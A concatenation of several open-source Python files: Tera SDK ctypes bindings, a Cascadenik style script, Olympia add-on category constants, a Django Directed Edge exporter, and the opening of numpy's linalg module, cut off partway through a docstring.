lib.tera_scan_descriptor.argtypes = [c_char_p, c_uint64]
lib.tera_scan_descriptor.restype = c_void_p
lib.tera_scan_descriptor_destroy.argtypes = [c_void_p]
lib.tera_scan_descriptor_destroy.restype = None
lib.tera_scan_descriptor_add_column.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64]
lib.tera_scan_descriptor_add_column.restype = None
lib.tera_scan_descriptor_add_column_family.argtypes = [c_void_p, c_char_p]
lib.tera_scan_descriptor_add_column_family.restype = None
lib.tera_scan_descriptor_set_buffer_size.argtypes = [c_void_p, c_int64]
lib.tera_scan_descriptor_set_buffer_size.restype = None
lib.tera_scan_descriptor_set_end.argtypes = [c_void_p, c_char_p, c_uint64]
lib.tera_scan_descriptor_set_end.restype = None
lib.tera_scan_descriptor_set_pack_interval.argtypes = [c_char_p, c_int64]
lib.tera_scan_descriptor_set_pack_interval.restype = None
lib.tera_scan_descriptor_set_max_versions.argtypes = [c_void_p, c_int32]
lib.tera_scan_descriptor_set_max_versions.restype = None
lib.tera_scan_descriptor_set_snapshot.argtypes = [c_void_p, c_uint64]
lib.tera_scan_descriptor_set_snapshot.restype = None
lib.tera_scan_descriptor_set_time_range.argtypes = [c_void_p,
c_int64, c_int64]
lib.tera_scan_descriptor_set_time_range.restype = None
def init_function_prototype_for_client():
""" client """
lib.tera_client_open.argtypes = [c_char_p, c_char_p, POINTER(c_char_p)]
lib.tera_client_open.restype = c_void_p
lib.tera_client_close.argtypes = [c_void_p]
lib.tera_client_close.restype = None
lib.tera_table_open.argtypes = [c_void_p, c_char_p, POINTER(c_char_p)]
lib.tera_table_open.restype = c_void_p
lib.tera_table_close.argtypes = [c_void_p]
lib.tera_table_close.restype = None
def init_function_prototype_for_table():
""" table """
lib.tera_table_get.argtypes = [c_void_p, c_char_p, c_uint64,
c_char_p, c_char_p, c_uint64,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64),
POINTER(c_char_p), c_uint64]
lib.tera_table_get.restype = c_bool
lib.tera_table_getint64.argtypes = [c_void_p, c_char_p, c_uint64,
c_char_p, c_char_p, c_uint64,
POINTER(c_int64), POINTER(c_char_p),
c_uint64]
lib.tera_table_getint64.restype = c_bool
lib.tera_table_put.argtypes = [c_void_p, c_char_p, c_uint64, c_char_p,
c_char_p, c_uint64, c_char_p, c_uint64,
POINTER(c_char_p)]
lib.tera_table_put.restype = c_bool
lib.tera_table_put_kv.argtypes = [c_void_p, c_char_p, c_uint64,
c_char_p, c_uint64, c_int32,
POINTER(c_char_p)]
lib.tera_table_put_kv.restype = c_bool
lib.tera_table_putint64.argtypes = [c_void_p, c_char_p, c_uint64, c_char_p,
c_char_p, c_uint64, c_int64,
POINTER(c_char_p)]
lib.tera_table_putint64.restype = c_bool
lib.tera_table_scan.argtypes = [c_void_p, c_void_p, POINTER(c_char_p)]
lib.tera_table_scan.restype = c_void_p
lib.tera_table_delete.argtypes = [c_void_p, c_char_p, c_uint64,
c_char_p, c_char_p, c_uint64]
lib.tera_table_delete.restype = c_bool
lib.tera_table_apply_mutation.argtypes = [c_void_p, c_void_p]
lib.tera_table_apply_mutation.restype = None
lib.tera_table_apply_mutation_batch.argtypes = [c_void_p,
c_void_p,
c_int64]
lib.tera_table_apply_mutation_batch.restype = None
lib.tera_table_is_put_finished.argtypes = [c_void_p]
lib.tera_table_is_put_finished.restype = c_bool
lib.tera_table_apply_reader.argtypes = [c_void_p, c_void_p]
lib.tera_table_apply_reader.restype = None
lib.tera_table_apply_reader_batch.argtypes = [c_void_p, c_void_p, c_int64]
lib.tera_table_apply_reader_batch.restype = None
lib.tera_table_is_get_finished.argtypes = [c_void_p]
lib.tera_table_is_get_finished.restype = c_bool
lib.tera_row_mutation.argtypes = [c_void_p, c_char_p, c_uint64]
lib.tera_row_mutation.restype = c_void_p
lib.tera_row_mutation_get_status_code.argtypes = [c_void_p]
lib.tera_row_mutation_get_status_code.restype = c_int64
lib.tera_row_mutation_destroy.argtypes = [c_void_p]
lib.tera_row_mutation_destroy.restype = None
def init_function_prototype_for_row_mutation():
""" row_mutation"""
lib.tera_row_mutation_put_kv.argtypes = [c_void_p, c_char_p,
c_uint64, c_int32]
lib.tera_row_mutation_put_kv.restype = None
lib.tera_row_mutation_put.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64,
c_char_p, c_uint64]
lib.tera_row_mutation_put.restype = None
lib.tera_row_mutation_put_with_timestamp.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64,
c_int64,
c_void_p, c_uint64]
lib.tera_row_mutation_put_with_timestamp.restype = None
lib.tera_row_mutation_put_int64.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64, c_int64]
lib.tera_row_mutation_put_int64.restype = None
lib.tera_row_mutation_set_callback.argtypes = [c_void_p, MUTATION_CALLBACK]
lib.tera_row_mutation_set_callback.restype = None
lib.tera_row_mutation_delete_column.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64]
lib.tera_row_mutation_delete_column.restype = None
lib.tera_row_mutation_delete_family.argtypes = [c_void_p, c_char_p]
lib.tera_row_mutation_delete_family.restype = None
lib.tera_row_mutation_delete_row.argtypes = [c_void_p]
lib.tera_row_mutation_delete_row.restype = None
lib.tera_row_mutation_rowkey.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_mutation_rowkey.restype = None
lib.tera_row_mutation_delete_column_all_versions.argtypes =\
[c_void_p, c_char_p, c_char_p, c_uint64]
lib.tera_row_mutation_delete_column_all_versions.restype = None
lib.tera_row_mutation_delete_column_with_version.argtypes =\
[c_void_p, c_char_p, c_char_p, c_uint64, c_int64]
lib.tera_row_mutation_delete_column_with_version.restype = None
def init_function_prototype_for_row_reader():
""" row_reader """
lib.tera_row_reader.argtypes = [c_void_p, c_char_p, c_uint64]
lib.tera_row_reader.restype = c_void_p
lib.tera_row_reader_add_column_family.argtypes = [c_void_p, c_char_p]
lib.tera_row_reader_add_column_family.restype = None
lib.tera_row_reader_add_column.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64]
lib.tera_row_reader_add_column.restype = None
lib.tera_row_reader_set_callback.argtypes = [c_void_p, READER_CALLBACK]
lib.tera_row_reader_set_callback.restype = None
lib.tera_row_reader_set_timestamp.argtypes = [c_void_p, c_int64]
lib.tera_row_reader_set_timestamp.restype = None
lib.tera_row_reader_set_time_range.argtypes = [c_void_p, c_int64, c_int64]
lib.tera_row_reader_set_time_range.restype = None
lib.tera_row_reader_set_snapshot.argtypes = [c_void_p, c_uint64]
lib.tera_row_reader_set_snapshot.restype = None
lib.tera_row_reader_set_max_versions.argtypes = [c_void_p, c_uint32]
lib.tera_row_reader_set_max_versions.restype = None
lib.tera_row_reader_set_timeout.argtypes = [c_void_p, c_int64]
lib.tera_row_reader_set_timeout.restype = None
lib.tera_row_reader_done.argtypes = [c_void_p]
lib.tera_row_reader_done.restype = c_bool
lib.tera_row_reader_next.argtypes = [c_void_p]
lib.tera_row_reader_next.restype = None
lib.tera_row_reader_rowkey.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_reader_rowkey.restype = None
lib.tera_row_reader_value.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_reader_value.restype = None
lib.tera_row_reader_value_int64.argtypes = [c_void_p]
lib.tera_row_reader_value_int64.restype = c_int64
lib.tera_row_reader_family.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_reader_family.restype = None
lib.tera_row_reader_qualifier.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_reader_qualifier.restype = None
lib.tera_row_reader_timestamp.argtypes = [c_void_p]
lib.tera_row_reader_timestamp.restype = c_int64
lib.tera_row_reader_get_status_code.argtypes = [c_void_p]
lib.tera_row_reader_get_status_code.restype = c_int64
lib.tera_row_reader_destroy.argtypes = [c_void_p]
lib.tera_row_reader_destroy.restype = None
def init_function_prototype():
""" init function prototype """
init_function_prototype_for_client()
init_function_prototype_for_table()
init_function_prototype_for_row_reader()
init_function_prototype_for_row_mutation()
init_function_prototype_for_scan()
libc.free.argtypes = [c_void_p]
libc.free.restype = None
def copy_string_to_user(value, size):
""" copy string """
result = string_at(value, size)
libc.free(value)
return result
try:
lib = cdll.LoadLibrary('./libtera_c.so')
except OSError:
lib = cdll.LoadLibrary('libtera_c.so')
libc = cdll.LoadLibrary('libc.so.6')
init_function_prototype()
| BaiduPS/tera | src/sdk/python/TeraSdk.py | Python | bsd-3-clause | 39,743 |
#!/usr/bin/env python
import sys
import os.path
import optparse
import cascadenik
# monkey with sys.path due to some weirdness inside cssutils
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from cssutils.tokenize2 import Tokenizer as cssTokenizer
def main(filename):
""" Given an input file containing nothing but styles, print out an
unrolled list of declarations in cascade order.
"""
input = open(filename, 'r').read()
declarations = cascadenik.stylesheet_declarations(input, is_merc=True)
for dec in declarations:
print dec.selector,
print '{',
print dec.property.name+':',
if cascadenik.style.properties[dec.property.name] in (cascadenik.style.color, cascadenik.style.boolean, cascadenik.style.numbers):
print str(dec.value.value)+';',
elif cascadenik.style.properties[dec.property.name] is cascadenik.style.uri:
print 'url("'+str(dec.value.value)+'");',
elif cascadenik.style.properties[dec.property.name] is str:
print '"'+str(dec.value.value)+'";',
elif cascadenik.style.properties[dec.property.name] in (int, float) or type(cascadenik.style.properties[dec.property.name]) is tuple:
print str(dec.value.value)+';',
print '}'
return 0
parser = optparse.OptionParser(usage="""cascadenik-style.py <style file>""")
if __name__ == '__main__':
(options, args) = parser.parse_args()
if not args:
parser.error('Please specify a .mss file')
stylefile = args[0]
if not stylefile.endswith('.mss'):
parser.error('Only accepts an .mss file')
sys.exit(main(stylefile))
| mapnik/Cascadenik | cascadenik-style.py | Python | bsd-3-clause | 1,717 |
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from olympia.constants.applications import (
ANDROID, FIREFOX, SEAMONKEY, THUNDERBIRD)
from olympia.constants.base import (
ADDON_DICT, ADDON_EXTENSION, ADDON_LPAPP, ADDON_PERSONA, ADDON_SEARCH,
ADDON_SLUGS, ADDON_STATICTHEME, ADDON_THEME)
class StaticCategory(object):
"""Helper to populate `CATEGORIES` and provide some helpers.
Note that any instance is immutable to avoid changing values
on the globally unique instances during test runs which can lead
to hard to debug sporadic test-failures.
"""
def __init__(self, id=None, app=None, type=None, misc=False,
name=None, slug=None, weight=0, description=None):
# Avoid triggering our own __setattr__ implementation
# to keep immutability intact but set initial values.
object.__setattr__(self, 'id', id)
object.__setattr__(self, 'application', app)
object.__setattr__(self, 'misc', misc)
object.__setattr__(self, 'name', name)
object.__setattr__(self, 'slug', slug)
object.__setattr__(self, 'type', type)
object.__setattr__(self, 'weight', weight)
object.__setattr__(self, 'description', description)
def __unicode__(self):
return unicode(self.name)
def __repr__(self):
return u'<%s: %s (%s)>' % (
self.__class__.__name__, self.__unicode__(), self.application)
def get_url_path(self):
try:
type = ADDON_SLUGS[self.type]
except KeyError:
type = ADDON_SLUGS[ADDON_EXTENSION]
return reverse('browse.%s' % type, args=[self.slug])
def _immutable(self, *args):
raise TypeError('%r instances are immutable' %
self.__class__.__name__)
__setattr__ = __delattr__ = _immutable
del _immutable
CATEGORIES = {
FIREFOX.id: {
ADDON_EXTENSION: {
'alerts-updates': StaticCategory(
id=72, name=_(u'Alerts & Updates')),
'appearance': StaticCategory(id=14, name=_(u'Appearance')),
'bookmarks': StaticCategory(id=22, name=_(u'Bookmarks')),
'download-management': StaticCategory(
id=5, name=_(u'Download Management')),
'feeds-news-blogging': StaticCategory(
id=1, name=_(u'Feeds, News & Blogging')),
'games-entertainment': StaticCategory(
id=142, name=_(u'Games & Entertainment')),
'language-support': StaticCategory(
id=37, name=_(u'Language Support')),
'photos-music-videos': StaticCategory(
id=38, name=_(u'Photos, Music & Videos')),
'privacy-security': StaticCategory(
id=12, name=_(u'Privacy & Security')),
'search-tools': StaticCategory(id=13, name=_(u'Search Tools')),
'shopping': StaticCategory(id=141, name=_(u'Shopping')),
'social-communication': StaticCategory(
id=71, name=_(u'Social & Communication')),
'tabs': StaticCategory(id=93, name=_(u'Tabs')),
'web-development': StaticCategory(
id=4, name=_(u'Web Development')),
'other': StaticCategory(id=73, name=_(u'Other'), weight=333)
},
ADDON_THEME: {
'animals': StaticCategory(id=30, name=_(u'Animals')),
'compact': StaticCategory(id=32, name=_(u'Compact')),
'large': StaticCategory(id=67, name=_(u'Large')),
'miscellaneous': StaticCategory(id=21, name=_(u'Miscellaneous')),
'modern': StaticCategory(id=62, name=_(u'Modern')),
'nature': StaticCategory(id=29, name=_(u'Nature')),
'os-integration': StaticCategory(id=61, name=_(u'OS Integration')),
'retro': StaticCategory(id=31, name=_(u'Retro')),
'sports': StaticCategory(id=26, name=_(u'Sports'))
},
ADDON_STATICTHEME: {
'abstract': StaticCategory(id=300, name=_(u'Abstract')),
'causes': StaticCategory(id=320, name=_(u'Causes')),
'fashion': StaticCategory(id=324, name=_(u'Fashion')),
'film-and-tv': StaticCategory(id=326, name=_(u'Film and TV')),
'firefox': StaticCategory(id=308, name=_(u'Firefox')),
'foxkeh': StaticCategory(id=310, name=_(u'Foxkeh')),
'holiday': StaticCategory(id=328, name=_(u'Holiday')),
'music': StaticCategory(id=322, name=_(u'Music')),
'nature': StaticCategory(id=302, name=_(u'Nature')),
'other': StaticCategory(id=314, name=_(u'Other'), weight=333),
'scenery': StaticCategory(id=306, name=_(u'Scenery')),
'seasonal': StaticCategory(id=312, name=_(u'Seasonal')),
'solid': StaticCategory(id=318, name=_(u'Solid')),
'sports': StaticCategory(id=304, name=_(u'Sports')),
'websites': StaticCategory(id=316, name=_(u'Websites'))
},
ADDON_DICT: {
'general': StaticCategory(id=95, name=_(u'General'))
},
ADDON_SEARCH: {
'bookmarks': StaticCategory(id=79, name=_(u'Bookmarks')),
'business': StaticCategory(id=80, name=_(u'Business')),
'dictionaries-encyclopedias': StaticCategory(
id=81, name=_(u'Dictionaries & Encyclopedias')),
'general': StaticCategory(id=82, name=_(u'General')),
'kids': StaticCategory(id=83, name=_(u'Kids')),
'multiple-search': StaticCategory(
id=84, name=_(u'Multiple Search')),
'music': StaticCategory(id=85, name=_(u'Music')),
'news-blogs': StaticCategory(id=86, name=_(u'News & Blogs')),
'photos-images': StaticCategory(id=87, name=_(u'Photos & Images')),
'shopping-e-commerce': StaticCategory(
id=88, name=_(u'Shopping & E-Commerce')),
'social-people': StaticCategory(id=89, name=_(u'Social & People')),
'sports': StaticCategory(id=90, name=_(u'Sports')),
'travel': StaticCategory(id=91, name=_(u'Travel')),
'video': StaticCategory(id=78, name=_(u'Video'))
},
ADDON_LPAPP: {
'general': StaticCategory(id=98, name=_(u'General'))
},
ADDON_PERSONA: {
'abstract': StaticCategory(id=100, name=_(u'Abstract')),
'causes': StaticCategory(id=120, name=_(u'Causes')),
'fashion': StaticCategory(id=124, name=_(u'Fashion')),
'film-and-tv': StaticCategory(id=126, name=_(u'Film and TV')),
'firefox': StaticCategory(id=108, name=_(u'Firefox')),
'foxkeh': StaticCategory(id=110, name=_(u'Foxkeh')),
'holiday': StaticCategory(id=128, name=_(u'Holiday')),
'music': StaticCategory(id=122, name=_(u'Music')),
'nature': StaticCategory(id=102, name=_(u'Nature')),
'other': StaticCategory(id=114, name=_(u'Other')),
'scenery': StaticCategory(id=106, name=_(u'Scenery')),
'seasonal': StaticCategory(id=112, name=_(u'Seasonal')),
'solid': StaticCategory(id=118, name=_(u'Solid')),
'sports': StaticCategory(id=104, name=_(u'Sports')),
'websites': StaticCategory(id=116, name=_(u'Websites'))
}
},
ANDROID.id: {
ADDON_EXTENSION: {
'device-features-location': StaticCategory(
id=145, name=_(u'Device Features & Location')),
'experimental': StaticCategory(id=151, name=_(u'Experimental')),
'feeds-news-blogging': StaticCategory(
id=147, name=_(u'Feeds, News, & Blogging')),
'performance': StaticCategory(id=144, name=_(u'Performance')),
'photos-media': StaticCategory(id=143, name=_(u'Photos & Media')),
'security-privacy': StaticCategory(
id=149, name=_(u'Security & Privacy')),
'shopping': StaticCategory(id=150, name=_(u'Shopping')),
'social-networking': StaticCategory(
id=148, name=_(u'Social Networking')),
'sports-games': StaticCategory(id=146, name=_(u'Sports & Games')),
'user-interface': StaticCategory(
id=152, name=_(u'User Interface')),
'other': StaticCategory(id=153, name=_(u'Other'), weight=333)
}
},
THUNDERBIRD.id: {
ADDON_EXTENSION: {
'appearance': StaticCategory(
id=208, name=_(u'Appearance and Customization')),
'calendar': StaticCategory(
id=204, name=_(u'Calendar and Date/Time')),
'chat': StaticCategory(id=210, name=_(u'Chat and IM')),
'composition': StaticCategory(
id=202, name=_(u'Message Composition')),
'contacts': StaticCategory(id=23, name=_(u'Contacts')),
'folders-and-filters': StaticCategory(
id=200, name=_(u'Folders and Filters')),
'importexport': StaticCategory(id=206, name=_(u'Import/Export')),
'language-support': StaticCategory(
id=69, name=_(u'Language Support')),
'message-and-news-reading': StaticCategory(
id=58, name=_(u'Message and News Reading')),
'miscellaneous': StaticCategory(id=50, name=_(u'Miscellaneous')),
'privacy-and-security': StaticCategory(
id=66, name=_(u'Privacy and Security')),
'tags': StaticCategory(id=212, name=_(u'Tags'))
},
ADDON_THEME: {
'compact': StaticCategory(id=64, name=_(u'Compact')),
'miscellaneous': StaticCategory(id=60, name=_(u'Miscellaneous')),
'modern': StaticCategory(id=63, name=_(u'Modern')),
'nature': StaticCategory(id=65, name=_(u'Nature'))
},
ADDON_DICT: {
'general': StaticCategory(id=97, name=_(u'General'))
},
ADDON_LPAPP: {
'general': StaticCategory(id=99, name=_(u'General'))
}
},
SEAMONKEY.id: {
ADDON_EXTENSION: {
'bookmarks': StaticCategory(id=51, name=_(u'Bookmarks')),
'downloading-and-file-management': StaticCategory(
id=42, name=_(u'Downloading and File Management')),
'interface-customizations': StaticCategory(
id=48, name=_(u'Interface Customizations')),
'language-support-and-translation': StaticCategory(
id=55, name=_(u'Language Support and Translation')),
'miscellaneous': StaticCategory(
id=49, name=_(u'Miscellaneous')),
'photos-and-media': StaticCategory(
id=56, name=_(u'Photos and Media')),
'privacy-and-security': StaticCategory(
id=46, name=_(u'Privacy and Security')),
'rss-news-and-blogging': StaticCategory(
id=39, name=_(u'RSS, News and Blogging')),
'search-tools': StaticCategory(id=47, name=_(u'Search Tools')),
'site-specific': StaticCategory(id=52, name=_(u'Site-specific')),
'web-and-developer-tools': StaticCategory(
id=41, name=_(u'Web and Developer Tools'))
},
ADDON_THEME: {
'miscellaneous': StaticCategory(id=59, name=_(u'Miscellaneous'))
},
ADDON_DICT: {
'general': StaticCategory(id=96, name=_(u'General'))
},
ADDON_LPAPP: {
'general': StaticCategory(id=130, name=_(u'General'))
}
},
}
CATEGORIES_BY_ID = {}
for app in CATEGORIES:
for type_ in CATEGORIES[app]:
for slug in CATEGORIES[app][type_]:
cat = CATEGORIES[app][type_][slug]
# Flatten some values and set them, avoiding immutability
# of `StaticCategory` by calling `object.__setattr__` directly.
if slug in ('miscellaneous', 'other'):
object.__setattr__(cat, 'misc', True)
object.__setattr__(cat, 'slug', slug)
object.__setattr__(cat, 'application', app)
object.__setattr__(cat, 'type', type_)
CATEGORIES_BY_ID[cat.id] = cat
| lavish205/olympia | src/olympia/constants/categories.py | Python | bsd-3-clause | 12,242 |
import contextlib
from directed_edge import Exporter, Item
from .utils import ident, get_database
@contextlib.contextmanager
def get_exporter(target=None):
if target is None:
target = get_database()
exporter = DjangoExporter(target)
yield exporter
exporter.finish()
class DjangoExporter(Exporter):
def export(self, item):
super(DjangoExporter, self).export(self.to_item(item))
def to_item(self, instance):
if isinstance(instance, (basestring, Item)):
return instance
item = DjangoItem(self._Exporter__database, ident(instance))
item.add_tag(ident(type(instance)))
return item
class DjangoItem(Item):
def link_to(self, other, *args, **kwargs):
super(DjangoItem, self).link_to(ident(other), *args, **kwargs)
| thread/django-directed-edge | django_directed_edge/export.py | Python | bsd-3-clause | 813 |
"""Lite version of scipy.linalg.
Notes
-----
This module is a lite version of the linalg.py module in SciPy which
contains high-level Python interface to the LAPACK library. The lite
version only accesses the following LAPACK functions: dgesv, zgesv,
dgeev, zgeev, dgesdd, zgesdd, dgelsd, zgelsd, dsyevd, zheevd, dgetrf,
zgetrf, dpotrf, zpotrf, dgeqrf, zgeqrf, zungqr, dorgqr.
"""
from __future__ import division, absolute_import, print_function
__all__ = ['matrix_power', 'solve', 'tensorsolve', 'tensorinv', 'inv',
'cholesky', 'eigvals', 'eigvalsh', 'pinv', 'slogdet', 'det',
'svd', 'eig', 'eigh', 'lstsq', 'norm', 'qr', 'cond', 'matrix_rank',
'LinAlgError', 'multi_dot']
import warnings
from numpy.core import (
array, asarray, zeros, empty, empty_like, transpose, intc, single, double,
csingle, cdouble, inexact, complexfloating, newaxis, ravel, all, Inf, dot,
add, multiply, sqrt, maximum, fastCopyAndTranspose, sum, isfinite, size,
finfo, errstate, geterrobj, longdouble, rollaxis, amin, amax, product, abs,
broadcast, atleast_2d, intp, asanyarray, isscalar, object_, ones
)
from numpy.core.multiarray import normalize_axis_index
from numpy.lib import triu, asfarray
from numpy.linalg import lapack_lite, _umath_linalg
from numpy.matrixlib.defmatrix import matrix_power
# For Python2/3 compatibility
_N = b'N'
_V = b'V'
_A = b'A'
_S = b'S'
_L = b'L'
fortran_int = intc
# Error object
class LinAlgError(Exception):
"""
Generic Python-exception-derived object raised by linalg functions.
General purpose exception class, derived from Python's exception.Exception
class, programmatically raised in linalg functions when a Linear
Algebra-related condition would prevent further correct execution of the
function.
Parameters
----------
None
Examples
--------
>>> from numpy import linalg as LA
>>> LA.inv(np.zeros((2,2)))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "...linalg.py", line 350,
in inv return wrap(solve(a, identity(a.shape[0], dtype=a.dtype)))
File "...linalg.py", line 249,
in solve
raise LinAlgError('Singular matrix')
numpy.linalg.LinAlgError: Singular matrix
"""
pass
# Dealing with errors in _umath_linalg
_linalg_error_extobj = None
def _determine_error_states():
global _linalg_error_extobj
errobj = geterrobj()
bufsize = errobj[0]
with errstate(invalid='call', over='ignore',
divide='ignore', under='ignore'):
invalid_call_errmask = geterrobj()[1]
_linalg_error_extobj = [bufsize, invalid_call_errmask, None]
_determine_error_states()
def _raise_linalgerror_singular(err, flag):
raise LinAlgError("Singular matrix")
def _raise_linalgerror_nonposdef(err, flag):
raise LinAlgError("Matrix is not positive definite")
def _raise_linalgerror_eigenvalues_nonconvergence(err, flag):
raise LinAlgError("Eigenvalues did not converge")
def _raise_linalgerror_svd_nonconvergence(err, flag):
raise LinAlgError("SVD did not converge")
def get_linalg_error_extobj(callback):
extobj = list(_linalg_error_extobj)
extobj[2] = callback
return extobj
def _makearray(a):
new = asarray(a)
wrap = getattr(a, "__array_prepare__", new.__array_wrap__)
return new, wrap
def isComplexType(t):
return issubclass(t, complexfloating)
_real_types_map = {single : single,
double : double,
csingle : single,
cdouble : double}
_complex_types_map = {single : csingle,
double : cdouble,
csingle : csingle,
cdouble : cdouble}
def _realType(t, default=double):
return _real_types_map.get(t, default)
def _complexType(t, default=cdouble):
return _complex_types_map.get(t, default)
def _linalgRealType(t):
"""Cast the type t to either double or cdouble."""
return double
_complex_types_map = {single : csingle,
double : cdouble,
csingle : csingle,
cdouble : cdouble}
def _commonType(*arrays):
# in lite version, use higher precision (always double or cdouble)
result_type = single
is_complex = False
for a in arrays:
if issubclass(a.dtype.type, inexact):
if isComplexType(a.dtype.type):
is_complex = True
rt = _realType(a.dtype.type, default=None)
if rt is None:
# unsupported inexact scalar
raise TypeError("array type %s is unsupported in linalg" %
(a.dtype.name,))
else:
rt = double
if rt is double:
result_type = double
if is_complex:
t = cdouble
result_type = _complex_types_map[result_type]
else:
t = double
return t, result_type
# _fastCopyAndTranpose assumes the input is 2D (as all the calls in here are).
_fastCT = fastCopyAndTranspose
def _to_native_byte_order(*arrays):
ret = []
for arr in arrays:
if arr.dtype.byteorder not in ('=', '|'):
ret.append(asarray(arr, dtype=arr.dtype.newbyteorder('=')))
else:
ret.append(arr)
if len(ret) == 1:
return ret[0]
else:
return ret
def _fastCopyAndTranspose(type, *arrays):
cast_arrays = ()
for a in arrays:
if a.dtype.type is type:
cast_arrays = cast_arrays + (_fastCT(a),)
else:
cast_arrays = cast_arrays + (_fastCT(a.astype(type)),)
if len(cast_arrays) == 1:
return cast_arrays[0]
else:
return cast_arrays
def _assertRank2(*arrays):
for a in arrays:
if a.ndim != 2:
raise LinAlgError('%d-dimensional array given. Array must be '
'two-dimensional' % a.ndim)
def _assertRankAtLeast2(*arrays):
for a in arrays:
if a.ndim < 2:
raise LinAlgError('%d-dimensional array given. Array must be '
'at least two-dimensional' % a.ndim)
def _assertSquareness(*arrays):
for a in arrays:
if max(a.shape) != min(a.shape):
raise LinAlgError('Array must be square')
def _assertNdSquareness(*arrays):
for a in arrays:
if max(a.shape[-2:]) != min(a.shape[-2:]):
raise LinAlgError('Last 2 dimensions of the array must be square')
def _assertFinite(*arrays):
for a in arrays:
if not (isfinite(a).all()):
raise LinAlgError("Array must not contain infs or NaNs")
def _isEmpty2d(arr):
# check size first for efficiency
return arr.size == 0 and product(arr.shape[-2:]) == 0
def _assertNoEmpty2d(*arrays):
for a in arrays:
if _isEmpty2d(a):
raise LinAlgError("Arrays cannot be empty")
# Linear equations
def tensorsolve(a, b, axes=None):
"""
Solve the tensor equation ``a x = b`` for x.
It is assumed that all indices of `x` are summed over in the product,
together with the rightmost indices of `a`, as is done in, for example,
``tensordot(a, x, axes=b.ndim)``.
Parameters
----------
a : array_like
Coefficient tensor, of shape ``b.shape + Q``. `Q`, a tuple, equals
the shape of that sub-tensor of `a` consisting of the appropriate
number of its rightmost indices, and must be such that
``prod(Q) == prod(b.shape)`` (in which sense `a` is said to be
'square').
b : array_like
Right-hand tensor, which can be of any shape.
axes : tuple of ints, optional
Axes in `a` to reorder to the right, before inversion.
If None (default), no reordering is done.
Returns
-------
x : ndarray, shape Q
Raises
------
LinAlgError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
numpy.tensordot, tensorinv, numpy.einsum
Examples
--------
>>> a = np.eye(2*3*4)
>>> a.shape = (2*3, 4, 2, 3, 4)
>>> b = np.random.randn(2*3, 4)
>>> x = np.linalg.tensorsolve(a, b)
>>> x.shape
(2, 3, 4)
>>> np.allclose(np.tensordot(a, x, axes=3), b)
True
"""
a, wrap = _makearray(a)
b = asarray(b)
an = a.ndim
if axes is not None:
allaxes = list(range(0, an))
for k in axes:
allaxes.remove(k)
allaxes.insert(an, k)
a = a.transpose(allaxes)
oldshape = a.shape[-(an-b.ndim):]
prod = 1
for k in oldshape:
prod *= k
a = a.reshape(-1, prod)
b = b.ravel()
res = wrap(solve(a, b))
res.shape = oldshape
return res
def solve(a, b):
"""
Solve a linear matrix equation, or system of linear scalar equations.
Computes the "exact" solution, `x`, of the well-determined, i.e., full
rank, linear matrix equation `ax = b`.
Parameters
----------
a : (..., M, M) array_like
Coefficient matrix.
b : {(..., M,), (..., M, K)}, array_like
Ordinate or "dependent variable" values.
Returns
-------
x : {(..., M,), (..., M, K)} ndarray
Solution to the system a x = b. Returned shape is identical to `b`.
Raises
------
LinAlgError
If `a` is singular or not square.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The solutions are computed using LAPACK routine _gesv
`a` must be square and of full-rank, i.e., all rows (or, equivalently,
columns) must be linearly independent; if either is not true, use
`lstsq` for the least-squares best "solution" of the
system/equation.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pg. 22.
Examples
--------
Solve the system of equations ``3 * x0 + x1 = 9`` and ``x0 + 2 * x1 = 8``:
>>> a = np.array([[3,1], [1,2]])
>>> b = np.array([9,8])
>>> x = np.linalg.solve(a, b)
>>> x
array([ 2., 3.])
Check that the solution is correct:
>>> np.allclose(np.dot(a, x), b)
True
"""
a, _ = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
b, wrap = _makearray(b)
t, result_t = _commonType(a, b)
# We use the b = (..., M,) logic, only if the number of extra dimensions
# match exactly
if b.ndim == a.ndim - 1:
if a.shape[-1] == 0 and b.shape[-1] == 0:
# Legal, but the ufunc cannot handle the 0-sized inner dims
# let the ufunc handle all wrong cases.
a = a.reshape(a.shape[:-1])
bc = broadcast(a, b)
return wrap(empty(bc.shape, dtype=result_t))
gufunc = _umath_linalg.solve1
else:
if b.size == 0:
if (a.shape[-1] == 0 and b.shape[-2] == 0) or b.shape[-1] == 0:
a = a[:,:1].reshape(a.shape[:-1] + (1,))
bc = broadcast(a, b)
return wrap(empty(bc.shape, dtype=result_t))
gufunc = _umath_linalg.solve
signature = 'DD->D' if isComplexType(t) else 'dd->d'
extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
r = gufunc(a, b, signature=signature, extobj=extobj)
return wrap(r.astype(result_t, copy=False))
def tensorinv(a, ind=2):
"""
Compute the 'inverse' of an N-dimensional array.
The result is an inverse for `a` relative to the tensordot operation
``tensordot(a, b, ind)``, i. e., up to floating-point accuracy,
``tensordot(tensorinv(a), a, ind)`` is the "identity" tensor for the
tensordot operation.
Parameters
----------
a : array_like
Tensor to 'invert'. Its shape must be 'square', i. e.,
``prod(a.shape[:ind]) == prod(a.shape[ind:])``.
ind : int, optional
Number of first indices that are involved in the inverse sum.
Must be a positive integer, default is 2.
Returns
-------
b : ndarray
`a`'s tensordot inverse, shape ``a.shape[ind:] + a.shape[:ind]``.
Raises
------
LinAlgError
